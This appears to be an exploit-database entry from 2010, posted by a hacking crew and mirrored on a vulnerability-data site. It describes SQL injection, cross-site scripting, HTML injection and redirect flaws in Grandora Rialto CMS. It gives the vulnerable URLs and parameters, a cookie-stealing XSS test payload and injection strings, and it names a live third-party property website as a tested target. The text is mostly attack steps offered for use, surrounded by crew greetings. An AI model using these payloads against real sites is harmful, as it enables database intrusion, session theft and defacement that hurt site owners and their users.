===============================================================
Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability
===============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ##################################### 1
0 I'm Th3 RDX member from Inj3ct0r Team 1
1 ##################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability
# Date: 1-07-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.0
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky, r0073r(inj3ct0r.com),
Nishi (br0wn_sug4r)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
RooT Bro waiting for u to come online desperately and missing you alot
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
[email protected]
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Grandora Rialto CMS SQLi|XSS|HTML|URL Redirecting Vulnerability
----- [ Vendor ] -----
http://www.grandora.com/
%\\
##############################################################################
##############################################################################
%//
----- [ Injection (s) ] -----
----- [ SQL Injection ] -----
Put [SQL CODE]
[XSS] http://server/rialto/listfull.asp?ID=669[SQL CODE]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
----- [ XSS Injection ] -----
Put [XSS CODE] = <script>alert(document.cookie)</script>
[XSS] http://server/rialto/searchadvanced.asp
In Box Paste Code: [XSS CODE]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
----- [ HTML Injection ] -----
Put [HTML CODE] = <marquee><font color=Red size=16>Th3 RDX/font></marquee>
[HTML] http://server/rialto/searchadvanced.asp
In Box Paste Code: [HTML CODE]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
----- [ URL Redirecting ] -----
Put [URL CODE] = <HTML><HEAD><TITLE>Redirect...</TITLE><META
HTTP-EQUIV="REFRESH" CONTENT="0;
URL=http://www.google.com"></HEAD><BODY>Redirect in
corso...</BODY></HTML>
[HTML] http://server/rialto/searchadvanced.asp
In Box Paste Code: [URL CODE]
%\\
##############################################################################
##############################################################################
%//
>>>>>> TESTED ON <<<<<<
----- [ Live Link (s) ] -----
[SQLi] http://www.twrightproperties.com/source/listfull.asp?ID=669';
[Link] http://www.twrightproperties.com/source/searchadvanced.asp
In Box Paste Code: [CODE (XSS + HTML + URL Redirection)]
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | Inj3ct0r Team | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN
=> c0d3 for motherland, h4ck for motherland
==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
Bug discovered : 1 July 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation